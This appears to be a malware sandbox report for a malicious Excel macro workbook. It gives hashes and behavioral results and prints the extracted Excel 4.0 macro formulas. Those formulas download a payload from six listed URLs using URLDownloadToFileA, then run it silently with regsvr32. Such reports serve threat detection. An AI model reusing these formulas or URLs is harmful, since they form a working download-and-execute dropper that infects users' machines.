Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
-
Size
40KB
-
Sample
241111-zv3j1avqfv
-
MD5
a76c65d76c17ef921f0dc53e1a29346e
-
SHA1
81ebd8e04e101b7deb869b243d2ca8c6e1bf7100
-
SHA256
735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
-
SHA512
c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b
-
SSDEEP
768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb
Behavioral task
behavioral1
Sample
735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://asempaye.com/404/zREXldL8ZfpsEepiC/
https://freesoft18.com/urq/dd1s9WyDLkdM/
https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/
https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/
https://pedroribeiro.work/wp-admin/qOkQQ/
https://hojeemdia.life/detector/klwHgC9eat/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx") =RETURN()
Extracted
https://asempaye.com/404/zREXldL8ZfpsEepiC/
https://freesoft18.com/urq/dd1s9WyDLkdM/
https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/
https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/
https://pedroribeiro.work/wp-admin/qOkQQ/
https://hojeemdia.life/detector/klwHgC9eat/
Extracted
https://asempaye.com/404/zREXldL8ZfpsEepiC/
Targets
-
-
Target
735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
-
Size
40KB
-
MD5
a76c65d76c17ef921f0dc53e1a29346e
-
SHA1
81ebd8e04e101b7deb869b243d2ca8c6e1bf7100
-
SHA256
735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313
-
SHA512
c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b
-
SSDEEP
768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-